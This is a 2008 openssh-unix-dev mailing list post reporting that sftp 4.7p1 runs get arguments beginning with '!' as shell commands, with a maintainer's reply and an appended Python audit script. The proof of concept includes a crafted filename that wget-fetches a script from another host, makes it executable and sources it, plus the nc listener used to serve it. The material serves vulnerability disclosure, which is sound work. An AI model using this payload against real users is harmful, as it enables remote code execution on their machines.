Strange sftp input parameter handling, user assisted code execution?
Roman Fiedler
roman.fiedler at telbiomed.at
Wed Jun 18 17:23:09 EST 2008
Damien Miller wrote:
> On Wed, 18 Jun 2008, Damien Miller wrote:
>
>> On Tue, 17 Jun 2008, Roman Fiedler wrote:
>>
>>> Hello list,
>>>
>>> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>>>
>>> sftp> get !xxxx
>>> /bin/bash: xxxx: command not found
>>> Shell exited with status 127
>> Can you reproduce this with OpenSSH 5.0p1?
>
> I can't reproduce this with 5.0, but I can with 4.7p1 so I guess
> it was fixed in my sftp argument processing rewrite.
>
> -d
That's good. I was just confused that the ! did also work for the
arguments and not only in front of a command (!get). I just did not
think that copy/pasting a remote filename to a get could cause this
behavior.
I looked at it a little bit closer and found that only direct copy and
paste of filenames from "ls" output can be harmful, no problem with mget *.
lg roman
PS: You were correct that the /bin/bash test did not work, that was a
mistake during testing, but the other test case works:
Server:
cd Tmp
touch '!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds'
nc -vnlp 1234
When connected send:
HTTP/1.1 200 OK
Content-Length: 60
echo "This output is from remote command!"
# padding ................................
Client:
sftp> cd Tmp
sftp> ls
!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
sftp> get !wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
--09:09:32-- http://10.255.255.2:1234/
=> `cmds'
Connecting to 10.255.255.2:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 70
100%[====================================>] 70 --.--K/s
09:09:36 (102.05 KB/s) - `cmds' saved [70/70]
This output is from remote command!
sftp>
(The wget line is split across lines in the mail client; make sure it
is on one line in the test.)
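The post shows that the 4.7p1 client treats a `get` argument beginning with `!` as a shell escape, so a filename copied out of `ls` output can end up executed locally. The following is an added example for this thread, not code from OpenSSH or from the poster: it audits a directory listing for entries that would be misread that way and refuses to build a `get` line for them. The `SAMPLE_LISTING` is constructed (modelled on the listing in the post), and the handling of leading whitespace is an assumption, flagged conservatively because the post does not show how the client treats it.

```python
"""Audit a remote 'ls' listing for filenames that a 4.7p1-era sftp client
would hand to the shell when pasted into 'get'.

Added example for this thread; not code from OpenSSH or from the poster.
Assumption: an argument whose first character is '!' is run as a shell
command by the affected client, as the 'get !xxxx' test in the thread
shows. Leading whitespace is not covered by the post and is stripped
before the check so that such names are flagged too (conservative).
"""
from __future__ import annotations

# Constructed sample listing, one filename per line, modelled on the
# 'sftp> ls' output quoted in the post.
SAMPLE_LISTING = """\
report.txt
!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
 !leading-space
data!inside.bin
"""


def is_shell_escape_name(name: str) -> bool:
    """True if pasting *name* as a 'get' argument would start with '!'.

    Whitespace is stripped first (assumption: flag conservatively, since
    the post does not show whether the client strips it).
    """
    return name.lstrip().startswith("!")


def audit_listing(listing: str) -> list[tuple[int, str]]:
    """Return (line_number, filename) for each entry in a one-name-per-line
    listing that the affected client would treat as a shell escape."""
    flagged: list[tuple[int, str]] = []
    for lineno, line in enumerate(listing.splitlines(), start=1):
        if line and is_shell_escape_name(line):
            flagged.append((lineno, line))
    return flagged


def safe_get_command(name: str) -> str:
    """Build the 'get <name>' command line, refusing names that the
    affected client would pass to the shell instead of fetching."""
    if is_shell_escape_name(name):
        raise ValueError(
            f"refusing to build 'get' for shell-escape-looking name: {name!r}"
        )
    return f"get {name}"


if __name__ == "__main__":
    for lineno, name in audit_listing(SAMPLE_LISTING):
        print(f"line {lineno}: would be run as a shell command: {name!r}")
```

Running the module prints the two suspicious entries of the constructed listing; `data!inside.bin` is not flagged because the `!` is not in the first position, which matches the behaviour described in the thread.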
More information about the openssh-unix-dev mailing list